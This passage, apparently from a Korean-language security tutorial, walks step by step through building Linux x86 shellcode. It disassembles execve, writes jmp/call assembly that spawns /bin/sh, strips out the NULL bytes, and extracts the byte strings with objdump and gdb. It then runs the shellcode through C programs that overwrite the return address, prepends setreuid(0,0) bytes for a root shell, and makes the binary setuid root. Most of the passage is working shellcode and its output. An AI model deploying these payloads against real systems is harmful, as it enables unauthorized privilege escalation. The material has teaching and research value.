-8\uc5d0 \uc8fc\uc18c(\ubb38\uc790\uc5f4\uc8fc\uc18c)\ub97c %eax\uc5d0 \ub123\uc74c. \uc8fc\uc18c\uc758 \uc8fc\uc18c. <br \/><br \/>0x80481f5 &lt;main+25&gt;: &nbsp;&nbsp; push &nbsp; %eax <br \/>\ubb38\uc790\uc5f4 \uc8fc\uc18c\uc758 \uc8fc\uc18c\ub97c stack\uc5d0 \uc800\uc7a5\ud568. <br \/><br \/>0x80481f6 &lt;main+26&gt;: &nbsp;&nbsp; pushl&nbsp; 0xfffffff8(%ebp) <br \/>\ubb38\uc790\uc5f4\uc758 \uc8fc\uc18c\ub97c stack\uc5d0 \uc800\uc7a5\ud568. <br \/><br \/>0x80481f9 &lt;main+29&gt;: &nbsp;&nbsp; call &nbsp; 0x804c36c &lt;__execve&gt; <br \/>execve()\ud568\uc218\ub97c \ud638\ucd9c\ud568. <br \/><br \/>0x804c36c &lt;__execve&gt;: &nbsp; push &nbsp; %ebp <br \/>0x804c36d &lt;__execve+1&gt;: mov &nbsp;&nbsp; $0x0,%eax <br \/>0x804c372 &lt;__execve+6&gt;: mov &nbsp;&nbsp; %esp,%ebp <br \/>\uc774 \uc2ef\uc810\uc5d0\uc11c stack\uc5d0 \uc313\uc5ec\uc788\ub294 data\ub97c \ubcf4\uba74 <br \/><br \/>&nbsp; &nbsp; &nbsp; &nbsp; +---------------+ <br \/>&nbsp; &nbsp; &nbsp; &nbsp; | &nbsp; &nbsp;&nbsp; %ebp &nbsp; &nbsp; | &nbsp; &lt;--- %ebp \uac12 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; (\ub0ae\uc740 \uc8fc\uc18c) <br \/>&nbsp; &nbsp; &nbsp; &nbsp; +---------------+ <br \/>&nbsp; &nbsp; &nbsp; &nbsp; | &nbsp; &nbsp;&nbsp; ret &nbsp; &nbsp;&nbsp; | &nbsp;&nbsp; %ebp + 0x04 <br \/>&nbsp; &nbsp; &nbsp; &nbsp; +---------------+ <br \/>&nbsp; &nbsp; &nbsp; &nbsp; | &nbsp;&nbsp; name[0] &nbsp;&nbsp; | &nbsp;&nbsp; %ebp + 0x08 &nbsp;&nbsp; ---&gt; %ebx <br \/>&nbsp; &nbsp; &nbsp; &nbsp; +---------------+ <br \/>&nbsp; &nbsp; &nbsp; &nbsp; | &nbsp; &nbsp; name &nbsp; &nbsp;&nbsp; | &nbsp; &nbsp; %ebp + 0x0c &nbsp;&nbsp; ---&gt; %ecx &nbsp; <br \/>&nbsp; &nbsp; &nbsp; &nbsp; +---------------+ <br \/>&nbsp; &nbsp; &nbsp; &nbsp; | &nbsp; &nbsp; 0x00 &nbsp; &nbsp;&nbsp; | &nbsp;&nbsp; %ebp + 0x10 &nbsp;&nbsp; ---&gt; %edx &nbsp; &nbsp; &nbsp; (\ub192\uc740 \uc8fc\uc18c) <br \/>&nbsp; &nbsp; &nbsp; &nbsp; +---------------+ <br \/><br \/>0x804c374 &lt;__execve+8&gt;: test &nbsp; %eax,%eax <br \/>0x804c376 &lt;__execve+10&gt;: &nbsp; &nbsp; &nbsp;&nbsp; push &nbsp; %edi <br \/>0x804c377 &lt;__execve+11&gt;: &nbsp; &nbsp; &nbsp;&nbsp; push &nbsp; %ebx <br \/>0x804c378 &lt;__execve+12&gt;: &nbsp; &nbsp; &nbsp;&nbsp; mov &nbsp;&nbsp; 0x8(%ebp),%edi <br \/>0x804c37b &lt;__execve+15&gt;: &nbsp; &nbsp; &nbsp;&nbsp; je &nbsp; &nbsp; 0x804c382 &lt;__execve+22&gt; <br \/>0x804c37d &lt;__execve+17&gt;: &nbsp; &nbsp; &nbsp;&nbsp; call &nbsp; 0x0 <br \/>0x804c382 &lt;__execve+22&gt;: &nbsp; &nbsp; &nbsp;&nbsp; mov &nbsp;&nbsp; 0xc(%ebp),%ecx <br \/>0x804c385 &lt;__execve+25&gt;: &nbsp; &nbsp; &nbsp;&nbsp; mov &nbsp;&nbsp; 0x10(%ebp),%edx <br \/>0x804c388 &lt;__execve+28&gt;: &nbsp; &nbsp; &nbsp;&nbsp; push &nbsp; %ebx <br \/>0x804c389 &lt;__execve+29&gt;: &nbsp; &nbsp; &nbsp;&nbsp; mov &nbsp;&nbsp; %edi,%ebx <br \/>0x804c38b &lt;__execve+31&gt;: &nbsp; &nbsp; &nbsp;&nbsp; mov &nbsp;&nbsp; $0xb,%eax <br \/>0x804c390 &lt;__execve+36&gt;: &nbsp; &nbsp; &nbsp;&nbsp; int &nbsp;&nbsp; $0x80 <br \/><br \/>\ucd5c\uc885\uc801\uc73c\ub85c int $0x80\uc774\uc804\uc5d0 %eax,%ebx,%ecx,%edx\uc5d0 \uac12\ub4e4\uc774 \uc544\ub798\uc640 \uac19\uc774 \ucc44\uc6cc\uc9c4 \uac83\uc744 \ubcfc\uc218 \uc788\ub2e4. <br \/><br \/>&nbsp; &nbsp; &nbsp;&nbsp; %eax &nbsp; ---&gt; &nbsp;&nbsp; 0xb &nbsp;&nbsp; ( execve()\uc5d0 \ub300\ud55c system call No. ) <br \/>&nbsp; &nbsp; &nbsp;&nbsp; %ebx &nbsp; ---&gt; &nbsp;&nbsp; name[0] <br \/>&nbsp; &nbsp; &nbsp;&nbsp; %ecx &nbsp; ---&gt; &nbsp;&nbsp; name <br \/>&nbsp; &nbsp; &nbsp;&nbsp; %edx &nbsp; ---&gt; &nbsp;&nbsp; 0x00&nbsp; ( execve()\uc758 \ub9c8\uc9c0\ub9c9 \uc778\uc218 ) <br \/><br \/>\uc774 \uc815\ubcf4\ub97c \uac00\uc9c0\uace0 \uc5b4\uc148\ube14\ub9ac\ub85c shellcode \ud504\ub85c\uae00\ub7a8\uc744 \ub9cc\ub4e4\uc5b4 \ubcf4\uc790. \uc774 shellcode\ub97c \uad6c\ud604\ud558\uae30 \uc704\ud574\uc11c\ub294 <br \/>2\uac00\uc9c0 \ub354 \uace0\ub824\ud574\uc57c \ud560 \uc810\uc774 \uc788\ub2e4. \ud558\ub098\ub294 \ubb38\uc790\uc5f4\uc758 \ub05d\uc5d0 NULL\uc744 \ub123\uc5b4\uc11c \ubb38\uc790\uc758 \ub05d\uc744 \uc54c\ub9ac\ub294 \uc791\uc5c5\uc744&nbsp; <br \/>\ud574\uc57c \ud558\uba70, \ub2e4\ub978 \ud558\ub098\ub294 name\uc744 \uad6c\ud604\ud574 \uc918\uc57c \ud55c\ub2e4\ub294 \uac83\uc774\ub2e4.&nbsp; \uc989 name = [\ubb38\uc790\uc5f4\uc8fc\uc18c]+[NULL] \uc774\ub2e4. <br \/>\uadf8\ub798\uc11c \ubb38\uc790\uc5f4\uc758 \uc704\uce58\ub294 jmp &amp; call\uc744 \uc774\uc6a9\ud558\uc5ec \uc0c1\ub300\uc8fc\uc18c\ub97c \uc54c\uc218 \uc788\uc73c\ubbc0\ub85c \ubb38\uc790\uc5f4 \ub4a4\uc5d0 name\ub97c \uad6c\ud604 <br \/>\ud558\uba74\ub41c\ub2e4. \uc544\ub798 \uc5b4\uc148\ube14\ub9ac \ud504\ub85c\uadf8\ub7a8\uc744 \ubcf4\uc790. <br \/><br \/><br \/>[willy@Null@Root]$ cat test51.s <br \/>.globl main <br \/>main: <br \/>&nbsp; &nbsp; &nbsp; &nbsp;&nbsp; jmp &nbsp; &nbsp; strings <br \/>start: &nbsp; popl &nbsp;&nbsp; %esi &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; &lt;--- \ubb38\uc790\uc5f4 \uc704\uce58 (\ubb38\uc790\uc5f4\uc740 \/bin\/sh 7\uc790) <br \/>&nbsp; &nbsp; &nbsp; &nbsp;&nbsp; movb &nbsp;&nbsp; $0x00,0x7(%esi) &nbsp; &nbsp; &lt;--- \ubb38\uc790\uc5f4 \ub05d\uc5d0 NULL\uc704\uce58 (\ubb38\uc790\uc5f4\uc774 \ub05d\ub0a8\uc744 \uc54c\ub9bc) <br \/>&nbsp; &nbsp; &nbsp; &nbsp;&nbsp; movl &nbsp;&nbsp; %esi, 0x8(%esi) &nbsp; &nbsp; &lt;--- name[0]\uc744 \uad6c\ud604\ud558\uae30 \uc704\ud574 \ubb38\uc790\uc5f4 \ub4a4\uc5d0 \ub123\uc74c. <br \/>&nbsp; &nbsp; &nbsp; &nbsp;&nbsp; movl &nbsp;&nbsp; $0x00,0xc(%esi) &nbsp; &nbsp; &lt;--- name[1]\uc744 \uad6c\ud604\ud558\uae30 \uc704\ud574\uc11c name[0]\ub4a4\uc5d0 NULL\uc744 \ub123\uc74c. <br \/>&nbsp; &nbsp; &nbsp; &nbsp;&nbsp; movl &nbsp;&nbsp; $0x0b,%eax &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; &lt;--- %eax\uc5d0 0xb(11)\uc744 \ub123\uc5b4 execve() system call\ud568.&nbsp; <br \/>&nbsp; &nbsp; &nbsp; &nbsp;&nbsp; movl &nbsp;&nbsp; %esi, %ebx &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; &lt;--- %ebx\uc5d0 \ubb38\uc790\uc5f4\uc744 \ub123\uc74c. <br \/>&nbsp; &nbsp; &nbsp; &nbsp;&nbsp; leal &nbsp;&nbsp; 0x8(%esi), %ecx &nbsp; &nbsp; &lt;--- %ecx\uc5d0 name = name[0]+name[1]\uc744 \ub123\uc74c. <br \/>&nbsp; &nbsp; &nbsp; &nbsp;&nbsp; movl &nbsp;&nbsp; 0xc(%esi), %edx &nbsp; &nbsp; &lt;--- %edx\uc5d0 NULL(0x00)\uc744 \ub123\ub294\ub2e4. <br \/>&nbsp; &nbsp; &nbsp; &nbsp;&nbsp; int &nbsp; &nbsp; $0x80 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &lt;--- interrupt 0x80\uc744 \ud574\uc11c system call\uc744 \ud568. <br \/>&nbsp; &nbsp; &nbsp; &nbsp;&nbsp; movl &nbsp;&nbsp; $0x01,%eax <br \/>&nbsp; &nbsp; &nbsp; &nbsp;&nbsp; movl &nbsp;&nbsp; $0x00,%ebx <br \/>&nbsp; &nbsp; &nbsp; &nbsp;&nbsp; int &nbsp; &nbsp; $0x80 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &lt;--- exit(0) system call. &nbsp; <br \/>strings: call start <br \/>&nbsp; &nbsp; &nbsp; &nbsp;&nbsp; .string \"\/bin\/sh\" <br \/><br \/>[willy@Null@Root]$ gcc test51.s -o test51 <br \/><br \/>[willy@Null@Root]$ objdump -d test51 <br \/><br \/>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; : <br \/>0804841c &lt;main&gt;: <br \/>804841c: &nbsp; &nbsp; &nbsp; eb 2a &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; jmp &nbsp;&nbsp; 8048448 &lt;strings&gt; <br \/><br \/>0804841e &lt;start&gt;: <br \/>804841e: &nbsp; &nbsp; &nbsp; 5e &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; pop &nbsp;&nbsp; %esi <br \/>804841f: &nbsp; &nbsp; &nbsp; c6 46 07 00 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; movb &nbsp; $0x0,0x7(%esi) <br \/>8048422: &nbsp; &nbsp; &nbsp; 89 76 08 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; mov &nbsp;&nbsp; %esi,0x8(%esi) <br \/>8048426: &nbsp; &nbsp; &nbsp; c7 46 0c 00 00 00 00 &nbsp;&nbsp; movl &nbsp; $0x0,0xc(%esi) <br \/>804842d: &nbsp; &nbsp; &nbsp; b8 0b 00 00 00 &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; mov &nbsp;&nbsp; $0xb,%eax <br \/>8048432: &nbsp; &nbsp; &nbsp; 89 f3 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; mov &nbsp;&nbsp; %esi,%ebx <br \/>8048434: &nbsp; &nbsp; &nbsp; 8d 4e 08 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; lea &nbsp;&nbsp; 0x8(%esi),%ecx <br \/>8048437: &nbsp; &nbsp; &nbsp; 8b 56 0c &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; mov &nbsp;&nbsp; 0xc(%esi),%edx <br \/>804843a: &nbsp; &nbsp; &nbsp; cd 80 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; int &nbsp;&nbsp; $0x80 <br \/>804843c: &nbsp; &nbsp; &nbsp; b8 01 00 00 00 &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; mov &nbsp;&nbsp; $0x1,%eax <br \/>8048441: &nbsp; &nbsp; &nbsp; bb 00 00 00 00 &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; mov &nbsp;&nbsp; $0x0,%ebx <br \/>8048446: &nbsp; &nbsp; &nbsp; cd 80 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; int &nbsp;&nbsp; $0x80 <br \/><br \/>08048448 &lt;strings&gt;: <br \/>8048448: &nbsp; &nbsp; &nbsp; e8 d1 ff ff ff &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; call &nbsp; 804841e &lt;start&gt; <br \/>804844d: &nbsp; &nbsp; &nbsp; 2f &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; das &nbsp; &nbsp; <br \/>804844e: &nbsp; &nbsp; &nbsp; 62 69 6e &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; bound&nbsp; %ebp,0x6e(%ecx) <br \/>8048451: &nbsp; &nbsp; &nbsp; 2f &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; das &nbsp; &nbsp; <br \/>8048452: &nbsp; &nbsp; &nbsp; 73 68 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; jae &nbsp;&nbsp; 80484bc &lt;gcc2_compiled.+0x20&gt; <br \/>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; : <br \/><br \/>\uc5ec\uae30\uc11c \uc5bb\uc5b4\uc9c4 \uae30\uacc4\uc5b4\ucf54\ub4dc\ub97c \uc815\ub9ac\ud574\uc11c \uc544\ub798 test43.c\uc640 \uac19\uc774 ret \uc8fc\uc18c\uc5d0 \uae30\uacc4\uc5b4\ucf54\ub4dc\uac00 \ub4e4\uc5b4\uac00\ub3c4\ub85d <br \/>\ud558\ub294 shellcode\uad6c\ub3d9 \ud504\ub85c\uadf8\ub7a8\uc744 \ub9cc\ub4e4\uc5b4 \uc2e4\ud589\ud574 \ubcf4\uc790. <br \/><br \/>[willy@Null@Root]$ cat test43.c&nbsp; <br \/><br \/>char sc[] = <br \/>\"\\xeb\\x2a\\x5e\\xc6\\x46\\x07\\x00\\x89\\x76\\x08\\xc7\\x46\\x0c\\x00\\x00\\x00\\x00\" <br \/>\"\\xb8\\x0b\\x00\\x00\\x00\\x89\\xf3\\x8d\\x4e\\x08\\x8b\\x56\\x0c\\xcd\\x80\\xb8\\x01\" <br \/>\"\\x00\\x00\\x00\\xbb\\x00\\x00\\x00\\x00\\xcd\\x80\\xe8\\xd1\\xff\\xff\\xff\/bin\/sh\"; <br \/><br \/>main() <br \/>{ <br \/>&nbsp;&nbsp; int *ret; <br \/><br \/>&nbsp;&nbsp; ret = (int *)&amp;ret + 2; <br \/>&nbsp;&nbsp; (*ret) = (int)sc; <br \/>} <br \/><br \/>[willy@Null@Root]$ gcc test43.c -o test43 <br \/><br \/>[willy@Null@Root]$ .\/test43 <br \/>sh-2.04$&nbsp; <br \/><br \/>shell\uc744 \uc5bb\ub294\ub370 \uc131\uacf5\ud558\uc600\ub2e4.. \ucd5c\uc885\uc801\uc73c\ub85c \ucf54\ub4dc\ub0b4\uc5d0 NULL\uc774 \ub098\ud0c0\ub098\ub294 \ubd80\ubd84\uc744 \uc544\ub798 test52.s\uc640 \uac19\uc774 <br \/>\uc218\uc815\ud558\uace0 \uc774\ubc88\uc5d0\ub294 gdb\ub97c \uc774\uc6a9\ud558\uc5ec \uae30\uacc4\uc5b4\ucf54\ub4dc\ub97c \ub9cc\ub4e4\uc5b4 \ubcf4\uc790. <br \/><br \/>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; \uc218\uc815\uc804 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; | &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; \uc218\uc815\ud6c4 &nbsp; <br \/>&nbsp; &nbsp; &nbsp;&nbsp; ----------------------------+------------------------------ <br \/>&nbsp; &nbsp; &nbsp;&nbsp; movb &nbsp;&nbsp; $0x00,0x7(%esi) &nbsp; &nbsp; | &nbsp; &nbsp;&nbsp; xor &nbsp;&nbsp; %eax,&nbsp; %eax <br \/>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; | &nbsp; &nbsp;&nbsp; movb &nbsp; %al, &nbsp; 0x7(%esi) <br \/>&nbsp; &nbsp; &nbsp;&nbsp; movl &nbsp;&nbsp; $0x00,0xc(%esi) &nbsp; &nbsp; | &nbsp; &nbsp;&nbsp; movl &nbsp; %eax,&nbsp; 0xc(%esi) <br \/>&nbsp; &nbsp; &nbsp;&nbsp; movl &nbsp;&nbsp; 0xc(%esi), %edx &nbsp; &nbsp; | &nbsp; &nbsp;&nbsp; xor &nbsp;&nbsp; %edx,&nbsp; %edx <br \/><br \/>[willy@Null@Root]$ cat test52.s <br \/>.globl main <br \/>main: <br \/>&nbsp; &nbsp; &nbsp; &nbsp; jmp &nbsp; &nbsp; strings <br \/>start:&nbsp; popl &nbsp;&nbsp; %esi <br \/>&nbsp; &nbsp; &nbsp; &nbsp; movl &nbsp;&nbsp; %esi, 0x8(%esi) <br \/>&nbsp; &nbsp; &nbsp; &nbsp; xor &nbsp; &nbsp; %eax,&nbsp; %eax <br \/>&nbsp; &nbsp; &nbsp; &nbsp; movb &nbsp;&nbsp; %al, 0x7(%esi) <br \/>&nbsp; &nbsp; &nbsp; &nbsp; movl &nbsp;&nbsp; %eax, 0xc(%esi) <br \/>&nbsp; &nbsp; &nbsp; &nbsp; movb &nbsp;&nbsp; $0x0b, %al <br \/>&nbsp; &nbsp; &nbsp; &nbsp; movl &nbsp;&nbsp; %esi, %ebx <br \/>&nbsp; &nbsp; &nbsp; &nbsp; leal &nbsp;&nbsp; 0x8(%esi), %ecx <br \/>&nbsp; &nbsp; &nbsp; &nbsp; xor &nbsp; &nbsp; %edx, %edx <br \/>&nbsp; &nbsp; &nbsp; &nbsp; int &nbsp; &nbsp; $0x80 <br \/>&nbsp; &nbsp; &nbsp; &nbsp; movb &nbsp;&nbsp; $0x01,%al <br \/>&nbsp; &nbsp; &nbsp; &nbsp; xor &nbsp; &nbsp; %ebx, %ebx <br \/>&nbsp; &nbsp; &nbsp; &nbsp; int &nbsp; &nbsp; $0x80 <br \/>strings:call start <br \/>&nbsp; &nbsp; &nbsp; &nbsp; .string \"\/bin\/sh\" <br \/><br \/><br \/>[willy@Null@Root]$ gcc test52.s -o test52 <br \/><br \/>\ucef4\ud37c\uc77c\ud55c\ub4a4 gdb\ub85c \uc2e4\ud589\ud654\uc77c\ub97c \uc5f0\ud6c4 disassemble main\uc744 \ud574\ubcf4\uba74 \ubc14\ub85c jump\uac00 \uc2dc\uc791\ub418\ub294 \uac83\uc744 \ubcfc\uc218&nbsp; <br \/>\uc788\ub2e4. \uadf8\ub7ec\ubbc0\ub85c x\/40bx main \ud558\uba74 \uae30\uacc4\uc5b4\ucf54\ub4dc\ub97c \ubcfc\uc218 \uc788\ub2e4.&nbsp; <br \/><br \/>[willy@Null@Root]$ gdb -q test52 <br \/>(gdb) disassem main <br \/>Dump of assembler code for function main: <br \/>0x804841c &lt;main&gt;: &nbsp; &nbsp; &nbsp; jmp &nbsp;&nbsp; 0x804843b &lt;strings&gt; <br \/>End of assembler dump. <br \/>(gdb) disassem start <br \/>Dump of assembler code for function start: <br \/>0x804841e &lt;start&gt;: &nbsp; &nbsp;&nbsp; pop &nbsp;&nbsp; %esi <br \/>0x804841f &lt;start+1&gt;: &nbsp;&nbsp; mov &nbsp;&nbsp; %esi,0x8(%esi) <br \/>0x8048422 &lt;start+4&gt;: &nbsp;&nbsp; xor &nbsp;&nbsp; %eax,%eax <br \/>0x8048424 &lt;start+6&gt;: &nbsp;&nbsp; mov &nbsp;&nbsp; %al,0x7(%esi) <br \/>0x8048427 &lt;start+9&gt;: &nbsp;&nbsp; mov &nbsp;&nbsp; %eax,0xc(%esi) <br \/>0x804842a &lt;start+12&gt;: &nbsp; mov &nbsp;&nbsp; $0xb,%al <br \/>0x804842c &lt;start+14&gt;: &nbsp; mov &nbsp;&nbsp; %esi,%ebx <br \/>0x804842e &lt;start+16&gt;: &nbsp; lea &nbsp;&nbsp; 0x8(%esi),%ecx <br \/>0x8048431 &lt;start+19&gt;: &nbsp; xor &nbsp;&nbsp; %edx,%edx <br \/>0x8048433 &lt;start+21&gt;: &nbsp; int &nbsp;&nbsp; $0x80 <br \/>0x8048435 &lt;start+23&gt;: &nbsp; mov &nbsp;&nbsp; $0x1,%al <br \/>0x8048437 &lt;start+25&gt;: &nbsp; xor &nbsp;&nbsp; %ebx,%ebx <br \/>0x8048439 &lt;start+27&gt;: &nbsp; int &nbsp;&nbsp; $0x80 <br \/>End of assembler dump. <br \/>(gdb) disassem strings <br \/>Dump of assembler code for function strings: <br \/>0x804843b &lt;strings&gt;: &nbsp;&nbsp; call &nbsp; 0x804841e &lt;start&gt; <br \/>0x8048440 &lt;strings+5&gt;:&nbsp; das &nbsp; &nbsp; <br \/>0x8048441 &lt;strings+6&gt;:&nbsp; bound&nbsp; %ebp,0x6e(%ecx) <br \/>0x8048444 &lt;strings+9&gt;:&nbsp; das &nbsp; &nbsp; <br \/>0x8048445 &lt;strings+10&gt;: jae &nbsp;&nbsp; 0x80484af &lt;_fini+35&gt; <br \/>0x8048447 &lt;strings+12&gt;: add &nbsp;&nbsp; %dl,0x90909090(%eax) <br \/>0x804844d &lt;strings+18&gt;: nop &nbsp; &nbsp; <br \/>0x804844e &lt;strings+19&gt;: nop &nbsp; &nbsp; <br \/>0x804844f &lt;strings+20&gt;: nop &nbsp; &nbsp; <br \/>End of assembler dump. <br \/>(gdb) x\/40bx main <br \/>0x804841c &lt;main&gt;: &nbsp; &nbsp; &nbsp; 0xeb &nbsp;&nbsp; 0x1d &nbsp;&nbsp; 0x5e &nbsp;&nbsp; 0x89 &nbsp;&nbsp; 0x76 &nbsp;&nbsp; 0x08 &nbsp;&nbsp; 0x31 &nbsp;&nbsp; 0xc0 <br \/>0x8048424 &lt;start+6&gt;: &nbsp;&nbsp; 0x88 &nbsp;&nbsp; 0x46 &nbsp;&nbsp; 0x07 &nbsp;&nbsp; 0x89 &nbsp;&nbsp; 0x46 &nbsp;&nbsp; 0x0c &nbsp;&nbsp; 0xb0 &nbsp;&nbsp; 0x0b <br \/>0x804842c &lt;start+14&gt;: &nbsp; 0x89 &nbsp;&nbsp; 0xf3 &nbsp;&nbsp; 0x8d &nbsp;&nbsp; 0x4e &nbsp;&nbsp; 0x08 &nbsp;&nbsp; 0x31 &nbsp;&nbsp; 0xd2 &nbsp;&nbsp; 0xcd <br \/>0x8048434 &lt;start+22&gt;: &nbsp; 0x80 &nbsp;&nbsp; 0xb0 &nbsp;&nbsp; 0x01 &nbsp;&nbsp; 0x31 &nbsp;&nbsp; 0xdb &nbsp;&nbsp; 0xcd &nbsp;&nbsp; 0x80 &nbsp;&nbsp; 0xe8 <br \/>0x804843c &lt;strings+1&gt;:&nbsp; 0xde &nbsp;&nbsp; 0xff &nbsp;&nbsp; 0xff &nbsp;&nbsp; 0xff &nbsp;&nbsp; 0x2f &nbsp;&nbsp; 0x62 &nbsp;&nbsp; 0x69 &nbsp;&nbsp; 0x6e <br \/><br \/>\uc5ec\uae30\uc11c \uad6c\ud55c \uae30\uacc4\uc5b4\ucf54\ub4dc\ub97c shellcode \uad6c\ub3d9 \ud504\ub85c\uadf8\ub7a8(test44.c)\uc5d0 \ub123\uc5b4 \uc2e4\ud589\uc2dc\ud0a4\uba74 \uc815\uc0c1\uc801\uc73c\ub85c <br \/>shell\uc774 \ub728\ub294\uac83\uc744 \ud655\uc778\ud560\uc218 \uc788\ub2e4. <br \/><br \/>[willy@Null@Root]$ cat test44.c&nbsp; <br \/>char sc1[] = <br \/>\"\\xeb\\x1d\\x5e\\x89\\x76\\x08\\x31\\xc0\\x88\\x46\\x07\\x89\\x46\\x0c\\xb0\\x0b\\x89\\xf3\\x8d\" <br \/>\"\\x4e\\x08\\x31\\xd2\\xcd\\x80\\xb0\\x01\\x31\\xdb\\xcd\\x80\\xe8\\xde\\xff\\xff\\xff\/bin\/sh\"; <br \/><br \/>main() <br \/>{ <br \/>&nbsp;&nbsp; int *ret; <br \/><br \/>&nbsp;&nbsp; ret = (int *)&amp;ret + 2; <br \/>&nbsp;&nbsp; (*ret) = (int)sc1; <br \/>} <br \/><br \/>[willy@Null@Root]$ gcc test44.c -o test44 <br \/><br \/>[willy@Null@Root]$ .\/test44 <br \/>sh-2.04$ ps <br \/>&nbsp; PID TTY &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; TIME CMD <br \/>9238 pts\/6 &nbsp;&nbsp; 00:00:00 bash <br \/>9262 pts\/6 &nbsp;&nbsp; 00:00:00 sh <br \/>9264 pts\/6 &nbsp;&nbsp; 00:00:00 ps <br \/><br \/>\uc774\uc81c shellcode\ub97c \uc644\uc131\ud558\uc600\ub2e4. \uadf8\ub7ec\ub098 linux 7.0\uc774\uc0c1\uc5d0\uc11c \uc774 shellcode\ub97c \uc0ac\uc6a9\ud558\uae30 \uc704\ud574\uc11c\ub294 \ud558\ub098\ub354 <br \/>\uae30\uacc4\ucf54\ub4dc\ub97c \ub9cc\ub4e4\uc5b4 \uc8fc\uc5b4\uc57c \ud55c\ub2e4. \uadf8\uac83\uc740 \ubc14\ub85c setreuid()\uc744 shellcode\uc55e\uc5d0 \ucd94\uac00\ud558\ub294 \uac83\uc774\ub2e4. <br \/>setreuid()\uc758 \uae30\uacc4\uc5b4\ucf54\ub4dc \ub9cc\ub4dc\ub294 \uac83\uc5d0 \ub300\ud574\uc11c\ub294 \ub2e8\uc21c\ud558\uae30 \ub54c\ubb38\uc5d0 \uc790\uc138\ud788 \uc124\uba85\ud558\uc9c0 \uc54a\ub294\ub2e4.&nbsp; <br \/>root uid\ub97c \uc124\uc815\ud558\ub294 setreuid() \ucf54\ub4dc\ub294 \uc544\ub798\uc640 \uac19\ub2e4. <br \/><br \/>main() <br \/>{ <br \/>&nbsp;&nbsp; setreuid(0,0); <br \/>} <br \/><br \/>&nbsp; &nbsp; &nbsp;&nbsp; \\x31\\xc0 &nbsp; &nbsp; &nbsp; &nbsp; \/\/ xor %eax,%eax <br \/>&nbsp; &nbsp; &nbsp;&nbsp; \\xb0\\x46 &nbsp; &nbsp; &nbsp; &nbsp; \/\/ mov $0x46,%al <br \/>&nbsp; &nbsp; &nbsp;&nbsp; \\x31\\xdb &nbsp; &nbsp; &nbsp; &nbsp; \/\/ xor %ebx,%ebx <br \/>&nbsp; &nbsp; &nbsp;&nbsp; \\x31\\xc9 &nbsp; &nbsp; &nbsp; &nbsp; \/\/ xor %ecx,%ecx <br \/>&nbsp; &nbsp; &nbsp;&nbsp; \\xcd\\x80 &nbsp; &nbsp; &nbsp; &nbsp; \/\/ int $0x80 <br \/><br \/>\uc774\ub807\uac8c \ub9cc\ub4e4\uc5b4\uc9c4 \ucf54\ub4dc\ub97c shellcode\uc55e\uc5d0 \ubd99\uc5ec \uc544\ub798\uc640 shell\uad6c\ub3d9 \ud504\ub85c\uadf8\ub7a8\uc744 \ub9cc\ub4e0\ub4a4&nbsp; \ucef4\ud37c\uc77c \ud558\uc5ec <br \/>\uc2e4\ud589\ud654\uc77c\uc5d0 root setuid\uc744 \ubd99\uc5ec\ubcf4\uc790. <br \/><br \/>[willy@Null@Root]$ cat test45.c <br \/>char sc[] = <br \/>\"\\x31\\xc0\\xb0\\x46\\x31\\xdb\\x31\\xc9\\xcd\\x80\" &nbsp; \/\/ setreuid(0,0); <br \/>\"\\xeb\\x1d\\x5e\\x89\\x76\\x08\\x31\\xc0\\x88\\x46\\x07\\x89\\x46\\x0c\\xb0\\x0b\\x89\\xf3\\x8d\\x4e\\x08\\x31\" <br \/>\"\\xd2\\xcd\\x80\\xb0\\x01\\x31\\xdb\\xcd\\x80\\xe8\\xde\\xff\\xff\\xff\/bin\/sh\"; <br \/><br \/>main() <br \/>{ <br \/>&nbsp;&nbsp; int *ret; <br \/><br \/>&nbsp;&nbsp; ret = (int *)&amp;ret + 2; <br \/>&nbsp;&nbsp; (*ret) = (int)sc; <br \/>} <br \/><br \/>[willy@Null@Root]$ gcc test45.c -o test45 <br \/><br \/>[root@Null@Root]# chown root test45 <br \/><br \/>[root@Null@Root]# chmod 4755 test45 <br \/><br \/>[root@Null@Root]# ls -al <br 